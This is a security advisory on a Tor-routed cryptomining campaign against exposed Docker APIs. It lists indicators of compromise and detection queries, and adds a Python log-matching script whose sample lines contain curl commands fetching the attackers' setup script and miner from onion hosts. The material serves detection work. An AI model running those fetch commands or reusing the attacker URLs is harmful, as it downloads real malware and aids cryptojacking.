Date: 06/19/2025
Severity: High
Summary
Cybercriminals have crafted a new attack method that leverages misconfigured Docker remote APIs and the Tor network to conduct covert cryptocurrency mining. Once inside a containerized environment, the attackers route their command-and-control and payload downloads over Tor to conceal their infrastructure while deploying cryptocurrency miners. A notable aspect of this campaign is the use of zstd, the compression tool built on the Zstandard algorithm, to deliver the miner binary as a compressed archive, chosen for its speed and compression efficiency. Cloud-reliant sectors, such as technology firms, financial institutions, and healthcare providers, are particularly at risk.
Indicators of Compromise (IOC) List
Domains\URLs:
http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh
http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add
http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname -m).zst
gulf.moneroocean.stream
IP Address:
198.199.72.27
Hash (SHA-256):
1bb95a02f1c12c142e4e34014412608668c56502f28520c07cad979fa8ea6455
04b307515dd8179f9c9855aa6803b333adb3e3475a0ecc688b698957f9f750ad
f185d41df90878555a0328c19b86e7e9663497384d6b3aae80cb93dbbd591740
b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8
Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection
Domains\URLs:
domainname like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh" or url like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh" or siteurl like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh"
or domainname like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add" or url like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add" or siteurl like "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add"
or domainname like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname" or url like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname" or siteurl like "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname"
or domainname like "gulf.moneroocean.stream" or url like "gulf.moneroocean.stream" or siteurl like "gulf.moneroocean.stream"
IP Address:
dstipaddress IN ("198.199.72.27") or srcipaddress IN ("198.199.72.27")
Hash:
sha256hash IN ("1bb95a02f1c12c142e4e34014412608668c56502f28520c07cad979fa8ea6455","04b307515dd8179f9c9855aa6803b333adb3e3475a0ecc688b698957f9f750ad","f185d41df90878555a0328c19b86e7e9663497384d6b3aae80cb93dbbd591740","b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8")
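The following is an added example, not part of this advisory and not Gurucul or Trend Micro code: a small Python matcher that runs the indicators listed above against log lines, for teams that want to sweep existing endpoint and network telemetry outside the TDIR platform. Two practical points it handles: .onion hostnames are resolved inside the Tor network, so they will not show up in enterprise DNS or forward-proxy logs, and the place these URLs surface is endpoint process-execution telemetry (the command line that fetched the script); and the third URL contains the shell expansion $(uname -m), which on a compromised host is replaced by the machine architecture, so the matcher treats that segment as a wildcard rather than matching the literal text. The log format and all sample lines are constructed for the example.

```python
import re

# Indicators copied from the advisory's IOC list above.
IOC_URLS = [
    "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh",
    "http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/bot/add",
    "http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-$(uname -m).zst",
]
IOC_DOMAINS = ["gulf.moneroocean.stream"]
IOC_IPS = {"198.199.72.27"}
IOC_SHA256 = {
    "1bb95a02f1c12c142e4e34014412608668c56502f28520c07cad979fa8ea6455",
    "04b307515dd8179f9c9855aa6803b333adb3e3475a0ecc688b698957f9f750ad",
    "f185d41df90878555a0328c19b86e7e9663497384d6b3aae80cb93dbbd591740",
    "b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8",
}

ARCH_EXPANSION = "$(uname -m)"


def url_to_regex(url):
    """Escape the URL literally, except that the shell expansion $(uname -m)
    becomes a wildcard for one path segment (e.g. x86_64 or aarch64)."""
    parts = [re.escape(p) for p in url.split(ARCH_EXPANSION)]
    return re.compile(r"[^/\s]+".join(parts))


URL_PATTERNS = [url_to_regex(u) for u in IOC_URLS]
# Domain must stand alone: not preceded/followed by hostname characters.
DOMAIN_PATTERNS = [
    re.compile(r"(?<![\w.-])" + re.escape(d) + r"(?![\w-])") for d in IOC_DOMAINS
]
IP_PATTERN = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_PATTERN = re.compile(r"\b[0-9a-fA-F]{64}\b")


def scan_line(line):
    """Return a list of (indicator_type, matched_value) hits for one log line."""
    hits = []
    for pat in URL_PATTERNS:
        m = pat.search(line)
        if m:
            hits.append(("url", m.group(0)))
    for pat in DOMAIN_PATTERNS:
        m = pat.search(line)
        if m:
            hits.append(("domain", m.group(0)))
    for ip in IP_PATTERN.findall(line):
        if ip in IOC_IPS:
            hits.append(("ip", ip))
    for digest in SHA256_PATTERN.findall(line):
        if digest.lower() in IOC_SHA256:
            hits.append(("sha256", digest.lower()))
    return hits


def scan_logs(lines):
    """Return (line_number, line, hits) for every line with at least one hit."""
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((number, line, hits))
    return results


# Constructed sample telemetry (hypothetical format: process execution,
# network connection and file-hash events from an endpoint agent).
SAMPLE_LOGS = [
    '2025-06-19T10:02:11Z host01 execve cmd="curl -sO http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/static/docker-init.sh"',
    '2025-06-19T10:02:40Z host01 execve cmd="curl -O http://2hdv5kven4m422wx4dmqabotumkeisrstzkzaotvuhwx3aebdig573qd.onion:9000/binary/system-linux-x86_64.zst"',
    "2025-06-19T10:03:05Z host01 conn dst=198.199.72.27:443 proto=tcp",
    "2025-06-19T10:03:20Z host01 file_hash path=/tmp/system sha256=b9b8a041ff1d71aaea1c9d353cc79f6d59ec03c781f34d731c3f00b85dc7ecd8",
    "2025-06-19T10:04:00Z host01 conn dst=gulf.moneroocean.stream:10128 proto=tcp",
    # Benign lines: neighbouring IP and the SHA-256 of an empty file.
    "2025-06-19T10:05:00Z host02 conn dst=198.199.72.28:443 proto=tcp",
    "2025-06-19T10:05:30Z host02 file_hash path=/usr/bin/ls sha256=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
]

if __name__ == "__main__":
    for number, line, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {number}: {hits}")
```

Run as a script it prints the five matching lines and their indicator hits; to sweep real telemetry, replace SAMPLE_LOGS with lines read from your own export. The architecture wildcard is the reason the second sample line matches even though its URL ends in system-linux-x86_64.zst rather than the literal $(uname -m) text from the IOC list.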
Reference:
https://www.trendmicro.com/en_us/research/25/f/tor-enabled-docker-exploit.html